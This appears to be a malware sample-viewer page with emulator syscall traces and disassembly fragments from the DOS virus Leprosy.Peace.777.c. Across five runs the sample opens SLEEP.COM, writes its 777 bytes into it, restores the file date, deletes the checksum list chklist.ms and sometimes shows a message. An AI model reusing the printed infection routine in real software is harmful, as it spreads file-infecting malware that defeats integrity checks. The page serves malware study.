Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Peace.777.c

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:00:19.103254336Z 78 PC: 12b5c | Find first file
2018-12-17T23:00:19.105817553Z 42 PC: 12b6e | Get date 0x12b6e: cmp dh, 0xc
0x12b71: jne 0x12b7a
0x12b73: cmp dl, 5
0x12b76: jne 0x12b7a
0x12b78: jmp 0x12bf0
0x12b7a: mov ah, 0x4e
0x12b7c: mov dx, 0x11a
0x12b7f: add dx, si
0x12b81: xor cx, cx
0x12b83: int 0x21
0x12b85: jb 0x12bc0
0x12b87: mov ax, 0x3d02
0x12b8a: mov dx, 0x9e
0x12b8d: int 0x21
0x12b8f: cmp dx, 0x10e
0x12b93: je 0x12bb2
0x12b95: mov word ptr [si + 0x1fd], ax
0x12b99: mov ax, 0x5700
0x12b9c: mov bx, word ptr [si + 0x1fd]
0x12ba0: int 0x21
2018-12-17T23:00:19.109223277Z 78 PC: 12b85 | Find first file
2018-12-17T23:00:19.116269935Z 61 PC: 12b8f | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:00:19.123463709Z 87 PC: 12ba2 | Get or set file date and time
2018-12-17T23:00:19.125818686Z 64 PC: 12bd9 | Write file or device (Write 777 bytes on handle 5)
2018-12-17T23:00:19.142160951Z 87 PC: 12be1 | Get or set file date and time
2018-12-17T23:00:19.145355541Z 62 PC: 12bbf | Close file
2018-12-17T23:00:19.156580756Z 65 PC: 12bed | Delete file (Filename = 'chklist.ms')
2018-12-17T23:00:19.163748155Z 44 PC: 12c09 | Get time 0x12c09: cmp dh, 0x1e
0x12c0c: jg 0x12c12
0x12c0e: mov ah, 0x4c
0x12c10: int 0x21
0x12c12: mov ah, 9
0x12c14: mov dx, 0x1cb
0x12c17: int 0x21
0x12c19: mov ah, 0x4c
0x12c1b: int 0x21
0x12c1d: mov ah, 0x4c
0x12c1f: int 0x21
0x12c21: mov ax, 0xb702
0x12c24: int 0x2f
0x12c26: cmp ax, 0xffff
0x12c29: jne 0x12c3b
0x12c2b: mov ax, 0xb706
0x12c2e: int 0x2f
0x12c30: mov word ptr [0x393], bx
0x12c34: xor bx, bx
0x12c36: mov ax, 0xb707
2018-12-17T23:00:19.166136587Z 9 PC: 12c19 | Display string (String= ' Let's have Peace in S.A. - from Ol' Jim BlueC:\�.�')
2018-12-17T23:00:19.17319355Z 76 PC: 12c1d | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13495,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:22.274977372Z 78 PC: 12b5c | Find first file
2018-12-25T12:38:22.27870784Z 42 PC: 12b6e | Get date 0x12b6e: cmp dh, 0xc
0x12b71: jne 0x12b7a
0x12b73: cmp dl, 5
0x12b76: jne 0x12b7a
0x12b78: jmp 0x12bf0
0x12b7a: mov ah, 0x4e
0x12b7c: mov dx, 0x11a
0x12b7f: add dx, si
0x12b81: xor cx, cx
0x12b83: int 0x21
0x12b85: jb 0x12bc0
0x12b87: mov ax, 0x3d02
0x12b8a: mov dx, 0x9e
0x12b8d: int 0x21
0x12b8f: cmp dx, 0x10e
0x12b93: je 0x12bb2
0x12b95: mov word ptr [si + 0x1fd], ax
0x12b99: mov ax, 0x5700
0x12b9c: mov bx, word ptr [si + 0x1fd]
0x12ba0: int 0x21
2018-12-25T12:38:22.281567631Z 78 PC: 12b85 | Find first file
2018-12-25T12:38:22.288432558Z 61 PC: 12b8f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:22.296702803Z 87 PC: 12ba2 | Get or set file date and time
2018-12-25T12:38:22.298745989Z 64 PC: 12bd9 | Write file or device (Write 777 bytes on handle 5)
2018-12-25T12:38:22.3148476Z 87 PC: 12be1 | Get or set file date and time
2018-12-25T12:38:22.316222606Z 62 PC: 12bbf | Close file
2018-12-25T12:38:22.330291936Z 65 PC: 12bed | Delete file (Filename = 'chklist.ms')
2018-12-25T12:38:22.335089203Z 44 PC: 12c09 | Get time 0x12c09: cmp dh, 0x1e
0x12c0c: jg 0x12c12
0x12c0e: mov ah, 0x4c
0x12c10: int 0x21
0x12c12: mov ah, 9
0x12c14: mov dx, 0x1cb
0x12c17: int 0x21
0x12c19: mov ah, 0x4c
0x12c1b: int 0x21
0x12c1d: mov ah, 0x4c
0x12c1f: int 0x21
0x12c21: mov ax, 0xb702
0x12c24: int 0x2f
0x12c26: cmp ax, 0xffff
0x12c29: jne 0x12c3b
0x12c2b: mov ax, 0xb706
0x12c2e: int 0x2f
0x12c30: mov word ptr [0x393], bx
0x12c34: xor bx, bx
0x12c36: mov ax, 0xb707
2018-12-25T12:38:22.337527595Z 76 PC: 12c12 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13495,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:23.018608648Z 78 PC: 12b5c | Find first file
2018-12-25T12:38:23.021106085Z 42 PC: 12b6e | Get date 0x12b6e: cmp dh, 0xc
0x12b71: jne 0x12b7a
0x12b73: cmp dl, 5
0x12b76: jne 0x12b7a
0x12b78: jmp 0x12bf0
0x12b7a: mov ah, 0x4e
0x12b7c: mov dx, 0x11a
0x12b7f: add dx, si
0x12b81: xor cx, cx
0x12b83: int 0x21
0x12b85: jb 0x12bc0
0x12b87: mov ax, 0x3d02
0x12b8a: mov dx, 0x9e
0x12b8d: int 0x21
0x12b8f: cmp dx, 0x10e
0x12b93: je 0x12bb2
0x12b95: mov word ptr [si + 0x1fd], ax
0x12b99: mov ax, 0x5700
0x12b9c: mov bx, word ptr [si + 0x1fd]
0x12ba0: int 0x21
2018-12-25T12:38:23.023318866Z 78 PC: 12b85 | Find first file
2018-12-25T12:38:23.029386218Z 61 PC: 12b8f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:23.036631542Z 87 PC: 12ba2 | Get or set file date and time
2018-12-25T12:38:23.038476695Z 64 PC: 12bd9 | Write file or device (Write 777 bytes on handle 5)
2018-12-25T12:38:23.052009961Z 87 PC: 12be1 | Get or set file date and time
2018-12-25T12:38:23.056196591Z 62 PC: 12bbf | Close file
2018-12-25T12:38:23.063549061Z 65 PC: 12bed | Delete file (Filename = 'chklist.ms')
2018-12-25T12:38:23.071746917Z 44 PC: 12c09 | Get time 0x12c09: cmp dh, 0x1e
0x12c0c: jg 0x12c12
0x12c0e: mov ah, 0x4c
0x12c10: int 0x21
0x12c12: mov ah, 9
0x12c14: mov dx, 0x1cb
0x12c17: int 0x21
0x12c19: mov ah, 0x4c
0x12c1b: int 0x21
0x12c1d: mov ah, 0x4c
0x12c1f: int 0x21
0x12c21: mov ax, 0xb702
0x12c24: int 0x2f
0x12c26: cmp ax, 0xffff
0x12c29: jne 0x12c3b
0x12c2b: mov ax, 0xb706
0x12c2e: int 0x2f
0x12c30: mov word ptr [0x393], bx
0x12c34: xor bx, bx
0x12c36: mov ax, 0xb707
2018-12-25T12:38:23.07424232Z 76 PC: 12c12 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":31,"TimeBased":true,"OriginalID":13495,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:24.308918414Z 78 PC: 12b5c | Find first file
2018-12-25T12:38:24.311434178Z 42 PC: 12b6e | Get date 0x12b6e: cmp dh, 0xc
0x12b71: jne 0x12b7a
0x12b73: cmp dl, 5
0x12b76: jne 0x12b7a
0x12b78: jmp 0x12bf0
0x12b7a: mov ah, 0x4e
0x12b7c: mov dx, 0x11a
0x12b7f: add dx, si
0x12b81: xor cx, cx
0x12b83: int 0x21
0x12b85: jb 0x12bc0
0x12b87: mov ax, 0x3d02
0x12b8a: mov dx, 0x9e
0x12b8d: int 0x21
0x12b8f: cmp dx, 0x10e
0x12b93: je 0x12bb2
0x12b95: mov word ptr [si + 0x1fd], ax
0x12b99: mov ax, 0x5700
0x12b9c: mov bx, word ptr [si + 0x1fd]
0x12ba0: int 0x21
2018-12-25T12:38:24.314168709Z 78 PC: 12b85 | Find first file
2018-12-25T12:38:24.320341574Z 61 PC: 12b8f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:24.3272551Z 87 PC: 12ba2 | Get or set file date and time
2018-12-25T12:38:24.329786782Z 64 PC: 12bd9 | Write file or device (Write 777 bytes on handle 5)
2018-12-25T12:38:24.34451874Z 87 PC: 12be1 | Get or set file date and time
2018-12-25T12:38:24.346465101Z 62 PC: 12bbf | Close file
2018-12-25T12:38:24.362329826Z 65 PC: 12bed | Delete file (Filename = 'chklist.ms')
2018-12-25T12:38:24.369769857Z 44 PC: 12c09 | Get time 0x12c09: cmp dh, 0x1e
0x12c0c: jg 0x12c12
0x12c0e: mov ah, 0x4c
0x12c10: int 0x21
0x12c12: mov ah, 9
0x12c14: mov dx, 0x1cb
0x12c17: int 0x21
0x12c19: mov ah, 0x4c
0x12c1b: int 0x21
0x12c1d: mov ah, 0x4c
0x12c1f: int 0x21
0x12c21: mov ax, 0xb702
0x12c24: int 0x2f
0x12c26: cmp ax, 0xffff
0x12c29: jne 0x12c3b
0x12c2b: mov ax, 0xb706
0x12c2e: int 0x2f
0x12c30: mov word ptr [0x393], bx
0x12c34: xor bx, bx
0x12c36: mov ax, 0xb707
2018-12-25T12:38:24.37230478Z 9 PC: 12c19 | Display string (String= ' Let's have Peace in S.A. - from Ol' Jim BlueC:\�.�')
2018-12-25T12:38:24.379463237Z 76 PC: 12c1d | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":31,"TimeBased":true,"OriginalID":13495,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:25.754479154Z 78 PC: 12b5c | Find first file
2018-12-25T12:38:25.756433471Z 42 PC: 12b6e | Get date 0x12b6e: cmp dh, 0xc
0x12b71: jne 0x12b7a
0x12b73: cmp dl, 5
0x12b76: jne 0x12b7a
0x12b78: jmp 0x12bf0
0x12b7a: mov ah, 0x4e
0x12b7c: mov dx, 0x11a
0x12b7f: add dx, si
0x12b81: xor cx, cx
0x12b83: int 0x21
0x12b85: jb 0x12bc0
0x12b87: mov ax, 0x3d02
0x12b8a: mov dx, 0x9e
0x12b8d: int 0x21
0x12b8f: cmp dx, 0x10e
0x12b93: je 0x12bb2
0x12b95: mov word ptr [si + 0x1fd], ax
0x12b99: mov ax, 0x5700
0x12b9c: mov bx, word ptr [si + 0x1fd]
0x12ba0: int 0x21
2018-12-25T12:38:25.757974184Z 78 PC: 12b85 | Find first file
2018-12-25T12:38:25.761790898Z 61 PC: 12b8f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:25.766243022Z 87 PC: 12ba2 | Get or set file date and time
2018-12-25T12:38:25.767298476Z 64 PC: 12bd9 | Write file or device (Write 777 bytes on handle 5)
2018-12-25T12:38:25.782067863Z 87 PC: 12be1 | Get or set file date and time
2018-12-25T12:38:25.783726199Z 62 PC: 12bbf | Close file
2018-12-25T12:38:25.792336734Z 65 PC: 12bed | Delete file (Filename = 'chklist.ms')
2018-12-25T12:38:25.79876504Z 44 PC: 12c09 | Get time 0x12c09: cmp dh, 0x1e
0x12c0c: jg 0x12c12
0x12c0e: mov ah, 0x4c
0x12c10: int 0x21
0x12c12: mov ah, 9
0x12c14: mov dx, 0x1cb
0x12c17: int 0x21
0x12c19: mov ah, 0x4c
0x12c1b: int 0x21
0x12c1d: mov ah, 0x4c
0x12c1f: int 0x21
0x12c21: mov ax, 0xb702
0x12c24: int 0x2f
0x12c26: cmp ax, 0xffff
0x12c29: jne 0x12c3b
0x12c2b: mov ax, 0xb706
0x12c2e: int 0x2f
0x12c30: mov word ptr [0x393], bx
0x12c34: xor bx, bx
0x12c36: mov ax, 0xb707
2018-12-25T12:38:25.800840205Z 9 PC: 12c19 | Display string (String= ' Let's have Peace in S.A. - from Ol' Jim BlueC:\�.�')
2018-12-25T12:38:25.80708826Z 76 PC: 12c1d | Terminate with return code (Return code = '36')